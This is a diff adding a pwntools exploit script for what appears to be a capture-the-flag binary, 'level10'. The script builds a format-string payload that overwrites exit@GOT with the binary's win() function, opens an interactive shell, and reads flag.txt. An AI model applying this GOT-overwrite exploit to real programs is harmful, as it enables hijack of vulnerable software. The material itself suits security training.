10

4/level10/test.py

@@ -0,0 +1,37 @@
+#!/usr/bin/env python3
+from pwn import *
+
+elf = ELF('./level10')
+
+# Addresses
+exit_got = elf.got['exit']
+win_addr = elf.symbols['win']
+
+print("exit got: ", hex(exit_got))
+print("win     : ", hex(win_addr))
+
+# Build a fmtstr payload that rewrites exit@GOT ? win()
+# write_size='short' uses %hn twice for 2-byte writes
+
+#for i in range(1,30):
+#print("##################### ", i)
+p = process(elf.path)
+#p = remote("localhost", 4010)
+
+context.clear(arch = 'amd64')
+payload = fmtstr_payload(offset=8, writes={exit_got: win_addr})
+
+# Send and get shell
+p.recvuntil("talk about?".encode())
+p.sendline(payload)
+print("send: ", payload.hex())
+res = p.recvline()
+print("got: ", res)
+p.interactive()
+res = p.recvline()
+print("got: ", res)
+
+p.sendline("cat flag.txt")
+print("send cat")
+res = p.recvline()
+print("got: ", res)